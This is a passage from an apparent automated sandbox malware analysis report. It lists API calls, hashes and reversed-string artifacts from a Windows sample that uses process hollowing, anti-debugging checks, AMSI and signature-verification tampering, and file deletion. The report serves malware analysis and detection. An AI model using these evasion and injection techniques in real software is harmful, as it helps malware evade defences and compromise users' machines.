                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$AllocCloseCreateStringWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3308905243-0
                                                                                                                                              • Opcode ID: 4886f44e0c2ff8a9cb9e22eeea00138d9e9aa46b19c65722582bfae178bf5a1b
                                                                                                                                              • Instruction ID: a6953b6f3cf82c64898f726502e625c64752106349d187a495ff9b7c1e160e3a
                                                                                                                                              • Opcode Fuzzy Hash: 4886f44e0c2ff8a9cb9e22eeea00138d9e9aa46b19c65722582bfae178bf5a1b
                                                                                                                                              • Instruction Fuzzy Hash: CC21FF72A40308BAEB21EAE4CD5AF9EB7BDEB04B04F614065B600F71C0D7B06F058B65

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 027D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027D8090,?,?,00000000,?,027D7A06,ntdll,00000000,00000000,027D7A4B,?,?,00000000), ref: 027D805E
                                                                                                                                                • Part of subcall function 027D8020: GetModuleHandleA.KERNELBASE(?), ref: 027D8072
                                                                                                                                                • Part of subcall function 027D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027D8150,?,?,00000000,00000000,?,027D8069,00000000,KernelBASE,00000000,00000000,027D8090), ref: 027D8115
                                                                                                                                                • Part of subcall function 027D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027D811B
                                                                                                                                                • Part of subcall function 027D80C8: GetProcAddress.KERNEL32(?,?), ref: 027D812D
                                                                                                                                              • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 027D8668
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                                                                              • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                                              • API String ID: 3130163322-2353454454
                                                                                                                                              • Opcode ID: 46e015bbe766837c97778e216d5d203a973e479e9d1ed255f2072a05499dbc6e
                                                                                                                                              • Instruction ID: 28d8341e1964401d74e03354d23ba673104ebffae77e38c047b9f251e7a86121
                                                                                                                                              • Opcode Fuzzy Hash: 46e015bbe766837c97778e216d5d203a973e479e9d1ed255f2072a05499dbc6e
                                                                                                                                              • Instruction Fuzzy Hash: 5D1115BA600208BFDB51EFA8DD99F9A37FDEB0C710F624418FA08D3641C634E9118B25
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 027D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027D8090,?,?,00000000,?,027D7A06,ntdll,00000000,00000000,027D7A4B,?,?,00000000), ref: 027D805E
                                                                                                                                                • Part of subcall function 027D8020: GetModuleHandleA.KERNELBASE(?), ref: 027D8072
                                                                                                                                                • Part of subcall function 027D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027D8150,?,?,00000000,00000000,?,027D8069,00000000,KernelBASE,00000000,00000000,027D8090), ref: 027D8115
                                                                                                                                                • Part of subcall function 027D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027D811B
                                                                                                                                                • Part of subcall function 027D80C8: GetProcAddress.KERNEL32(?,?), ref: 027D812D
                                                                                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 027D7A27
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                              • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                              • API String ID: 4072585319-445027087
                                                                                                                                              • Opcode ID: c8e7a912d36601756ebaee2ddee6cda5739fe8a3025939501872c3dff583a907
                                                                                                                                              • Instruction ID: 0c1ba70147921ca5b262f19a71fa6777ad4cccc54913937a16eac6dfe39b67e0
                                                                                                                                              • Opcode Fuzzy Hash: c8e7a912d36601756ebaee2ddee6cda5739fe8a3025939501872c3dff583a907
                                                                                                                                              • Instruction Fuzzy Hash: FB118875600208BFEB15DF64DC99F9E77FEEB4C710F618465B504D7640D634EA148B24
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 027D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027D8090,?,?,00000000,?,027D7A06,ntdll,00000000,00000000,027D7A4B,?,?,00000000), ref: 027D805E
                                                                                                                                                • Part of subcall function 027D8020: GetModuleHandleA.KERNELBASE(?), ref: 027D8072
                                                                                                                                                • Part of subcall function 027D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027D8150,?,?,00000000,00000000,?,027D8069,00000000,KernelBASE,00000000,00000000,027D8090), ref: 027D8115
                                                                                                                                                • Part of subcall function 027D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027D811B
                                                                                                                                                • Part of subcall function 027D80C8: GetProcAddress.KERNEL32(?,?), ref: 027D812D
                                                                                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 027D7A27
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                              • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                              • API String ID: 4072585319-445027087
                                                                                                                                              • Opcode ID: 514f25ec0e3b375e00309b9dd7159bf230a48de086af2df862c8d24626bbc1ab
                                                                                                                                              • Instruction ID: 191cc1ff38364705ebbf9e1f50e47dc0bf9154ed9f73675797307fde5e0fcb21
                                                                                                                                              • Opcode Fuzzy Hash: 514f25ec0e3b375e00309b9dd7159bf230a48de086af2df862c8d24626bbc1ab
                                                                                                                                              • Instruction Fuzzy Hash: 8D118875600208BFEB15DF64DC99F9E77BEEB4C710F618465B504D7640D634AA148B24
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 027D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027D8090,?,?,00000000,?,027D7A06,ntdll,00000000,00000000,027D7A4B,?,?,00000000), ref: 027D805E
                                                                                                                                                • Part of subcall function 027D8020: GetModuleHandleA.KERNELBASE(?), ref: 027D8072
                                                                                                                                                • Part of subcall function 027D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027D8150,?,?,00000000,00000000,?,027D8069,00000000,KernelBASE,00000000,00000000,027D8090), ref: 027D8115
                                                                                                                                                • Part of subcall function 027D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027D811B
                                                                                                                                                • Part of subcall function 027D80C8: GetProcAddress.KERNEL32(?,?), ref: 027D812D
                                                                                                                                              • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 027D82C5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                                                                              • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                                              • API String ID: 2521977463-737317276
                                                                                                                                              • Opcode ID: d5615f95f02b0bf3c1cabb63a1a3c9616114932620ae2e8b51c252840f328725
                                                                                                                                              • Instruction ID: e86dc26300628f109bde28dc45aeedc3fada5f65082a5c8da1988f24d17b20cd
                                                                                                                                              • Opcode Fuzzy Hash: d5615f95f02b0bf3c1cabb63a1a3c9616114932620ae2e8b51c252840f328725
                                                                                                                                              • Instruction Fuzzy Hash: 57018079600208BFEB01EFA4D899F5E77FEEB4C700F618464F504D7640D634A9158B25
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 027D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027D8090,?,?,00000000,?,027D7A06,ntdll,00000000,00000000,027D7A4B,?,?,00000000), ref: 027D805E
                                                                                                                                                • Part of subcall function 027D8020: GetModuleHandleA.KERNELBASE(?), ref: 027D8072
                                                                                                                                                • Part of subcall function 027D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027D8150,?,?,00000000,00000000,?,027D8069,00000000,KernelBASE,00000000,00000000,027D8090), ref: 027D8115
                                                                                                                                                • Part of subcall function 027D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027D811B
                                                                                                                                                • Part of subcall function 027D80C8: GetProcAddress.KERNEL32(?,?), ref: 027D812D
                                                                                                                                              • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027D7D74
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                                                              • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                                              • API String ID: 2719805696-3542721025
                                                                                                                                              • Opcode ID: 24630d61e4e6f907627a4f939d9ae6a53aaf997f6eb8a3f71ffe33447f79da08
                                                                                                                                              • Instruction ID: 3a7261d3a8c38e71cf9f5bd0ea46291642d7b874a2f71947fc99d8f769ae424b
                                                                                                                                              • Opcode Fuzzy Hash: 24630d61e4e6f907627a4f939d9ae6a53aaf997f6eb8a3f71ffe33447f79da08
                                                                                                                                              • Instruction Fuzzy Hash: 07018079600208AFDB05EFA5DC59E9EBBFEEB4C700FA18428F504D7680D634A9148B60
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 027D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027D8090,?,?,00000000,?,027D7A06,ntdll,00000000,00000000,027D7A4B,?,?,00000000), ref: 027D805E
                                                                                                                                                • Part of subcall function 027D8020: GetModuleHandleA.KERNELBASE(?), ref: 027D8072
                                                                                                                                                • Part of subcall function 027D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027D8150,?,?,00000000,00000000,?,027D8069,00000000,KernelBASE,00000000,00000000,027D8090), ref: 027D8115
                                                                                                                                                • Part of subcall function 027D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027D811B
                                                                                                                                                • Part of subcall function 027D80C8: GetProcAddress.KERNEL32(?,?), ref: 027D812D
                                                                                                                                              • NtUnmapViewOfSection.NTDLL(?,?), ref: 027D8529
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                                                                              • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                                              • API String ID: 3503870465-2520021413
                                                                                                                                              • Opcode ID: 0355e0fa3264f32211b22b722e02d95081289489bcc62efd089ebb095adcc46a
                                                                                                                                              • Instruction ID: de134c8959dd139e754361b7693ab6aff1a72f1d109e72984f4c768267f6aa80
                                                                                                                                              • Opcode Fuzzy Hash: 0355e0fa3264f32211b22b722e02d95081289489bcc62efd089ebb095adcc46a
                                                                                                                                              • Instruction Fuzzy Hash: 3F01A778640204BFEB11EF74DC6DF5D7BBFEB49700FA28864F405D7A40D634AA058A21
                                                                                                                                              APIs
                                                                                                                                              • RtlInitUnicodeString.NTDLL(?,?), ref: 027DDA6C
                                                                                                                                              • RtlDosPa.N(00000000,?,00000000,00000000,00000000,027DDABE), ref: 027DDA82
                                                                                                                                              • NtDeleteFile.NTDLL(?), ref: 027DDAA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DeleteFileInitStringUnicode
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3559453722-0
                                                                                                                                              • Opcode ID: 70f3d7cceb49a65b66b88f5e76e79c2999cef016fcecc708aa9a09ccba7c11c8
                                                                                                                                              • Instruction ID: 49d8df17833a2cfeffcd5d841fadcd486442a089b45642e0991d8ec6f7c8e72c
                                                                                                                                              • Opcode Fuzzy Hash: 70f3d7cceb49a65b66b88f5e76e79c2999cef016fcecc708aa9a09ccba7c11c8
                                                                                                                                              • Instruction Fuzzy Hash: 2A016276A08348BEEB16E7F0CD55BDD77BDAB84704F5180929200F7081DB746F048B29
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 027C4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 027C4EDA
                                                                                                                                              • RtlInitUnicodeString.NTDLL(?,?), ref: 027DDA6C
                                                                                                                                              • RtlDosPa.N(00000000,?,00000000,00000000,00000000,027DDABE), ref: 027DDA82
                                                                                                                                              • NtDeleteFile.NTDLL(?), ref: 027DDAA1
                                                                                                                                                • Part of subcall function 027C4C0C: SysFreeString.OLEAUT32(027DE950), ref: 027C4C1A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: String$AllocDeleteFileFreeInitUnicode
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2841551397-0
                                                                                                                                              • Opcode ID: 0528a5981576d5e74d37fc9835e78feba4bab7b4b2809bb9eece9770c8367ed5
                                                                                                                                              • Instruction ID: 88f50c640818f467d1710603f2ba8d68863af7992c044f1c7bf3474bcde10aa5
                                                                                                                                              • Opcode Fuzzy Hash: 0528a5981576d5e74d37fc9835e78feba4bab7b4b2809bb9eece9770c8367ed5
                                                                                                                                              • Instruction Fuzzy Hash: A701F47690420CBADB21EBE4CD55FDEB7BDEB48700F614465A600F2180EB746F048A65
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 027D6CF4: CLSIDFromProgID.OLE32(00000000,?,00000000,027D6D41,?,?,?,00000000), ref: 027D6D21
                                                                                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,027D6E34,00000000,00000000,027D6DB3,?,00000000,027D6E23), ref: 027D6D9F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateFromInstanceProg
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2151042543-0
                                                                                                                                              • Opcode ID: 1cba547bc375c16c72b6889c317b72960d7b528b81c7172983c0cdd1a0f8be09
                                                                                                                                              • Instruction ID: 94a0998677a27265069f908c80c4fd9430166fc42bbe59625fc0b481716f008b
                                                                                                                                              • Opcode Fuzzy Hash: 1cba547bc375c16c72b6889c317b72960d7b528b81c7172983c0cdd1a0f8be09
                                                                                                                                              • Instruction Fuzzy Hash: D901F2B1208704AEE706DF75EC6686BBFBDFB49B10B624879F905E2640E6309A00C960
                                                                                                                                              APIs
                                                                                                                                              • InetIsOffline.URL(00000000,00000000,027EAFA1,?,?,?,000002F7,00000000,00000000), ref: 027DECAE
                                                                                                                                                • Part of subcall function 027D8824: LoadLibraryA.KERNEL32(00000000,00000000,027D890B), ref: 027D8858
                                                                                                                                                • Part of subcall function 027D8824: FreeLibrary.KERNEL32(74AD0000,00000000,02821388,Function_000065D8,00000004,02821398,02821388,05F5E0FF,00000040,0282139C,74AD0000,00000000,00000000,00000000,00000000,027D890B), ref: 027D88EB
                                                                                                                                                • Part of subcall function 027DEB94: GetModuleHandleW.KERNEL32(KernelBase,?,027DEF98,UacInitialize,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,ScanBuffer,0282137C,027EAFD8,ScanString,0282137C,027EAFD8,Initialize), ref: 027DEB9A
                                                                                                                                                • Part of subcall function 027DEB94: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 027DEBAC
                                                                                                                                                • Part of subcall function 027DEBF0: GetModuleHandleW.KERNEL32(KernelBase), ref: 027DEC00
                                                                                                                                                • Part of subcall function 027DEBF0: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 027DEC12
                                                                                                                                                • Part of subcall function 027DEBF0: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 027DEC29
                                                                                                                                                • Part of subcall function 027C7E18: GetFileAttributesA.KERNEL32(00000000,?,027DF8CC,ScanString,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,ScanString,0282137C,027EAFD8,UacScan,0282137C,027EAFD8,UacInitialize), ref: 027C7E23
                                                                                                                                                • Part of subcall function 027CC2EC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,029158C8,?,027DFBFE,ScanBuffer,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,ScanBuffer,0282137C,027EAFD8,OpenSession), ref: 027CC303
                                                                                                                                                • Part of subcall function 027DDBB0: RtlDosPa.N(00000000,?,00000000,00000000,00000000,027DDC80), ref: 027DDBEB
                                                                                                                                                • Part of subcall function 027DDBB0: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,027DDC80), ref: 027DDC1B
                                                                                                                                                • Part of subcall function 027DDBB0: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 027DDC30
                                                                                                                                                • Part of subcall function 027DDBB0: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 027DDC5C
                                                                                                                                                • Part of subcall function 027DDBB0: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 027DDC65
                                                                                                                                                • Part of subcall function 027C7E3C: GetFileAttributesA.KERNEL32(00000000,?,027E2A49,ScanString,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,ScanBuffer,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,Initialize), ref: 027C7E47
                                                                                                                                                • Part of subcall function 027C7FD0: CreateDirectoryA.KERNEL32(00000000,00000000,?,027E2BE7,OpenSession,0282137C,027EAFD8,ScanString,0282137C,027EAFD8,Initialize,0282137C,027EAFD8,ScanString,0282137C,027EAFD8), ref: 027C7FDD
                                                                                                                                                • Part of subcall function 027DDACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,027DDB9E), ref: 027DDB0B
                                                                                                                                                • Part of subcall function 027DDACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 027DDB45
                                                                                                                                                • Part of subcall function 027DDACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 027DDB72
                                                                                                                                                • Part of subcall function 027DDACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 027DDB7B
                                                                                                                                                • Part of subcall function 027D87A0: LoadLibraryW.KERNEL32(bcrypt,?,00000614,00000000,028213A4,027DA3C7,ScanString,028213A4,027DA77C,ScanBuffer,028213A4,027DA77C,Initialize,028213A4,027DA77C,UacScan), ref: 027D87B4
                                                                                                                                                • Part of subcall function 027D87A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 027D87CE
                                                                                                                                                • Part of subcall function 027D87A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000614,00000000,028213A4,027DA3C7,ScanString,028213A4,027DA77C,ScanBuffer,028213A4,027DA77C,Initialize), ref: 027D880A
                                                                                                                                                • Part of subcall function 027D870C: LoadLibraryW.KERNEL32(amsi), ref: 027D8715
                                                                                                                                                • Part of subcall function 027D870C: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 027D8774
                                                                                                                                              • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,ScanBuffer,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,027EB330), ref: 027E49B7
                                                                                                                                                • Part of subcall function 027DDA44: RtlInitUnicodeString.NTDLL(?,?), ref: 027DDA6C
                                                                                                                                                • Part of subcall function 027DDA44: RtlDosPa.N(00000000,?,00000000,00000000,00000000,027DDABE), ref: 027DDA82
                                                                                                                                                • Part of subcall function 027DDA44: NtDeleteFile.NTDLL(?), ref: 027DDAA1
                                                                                                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 027E4BB7
                                                                                                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 027E4C0D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
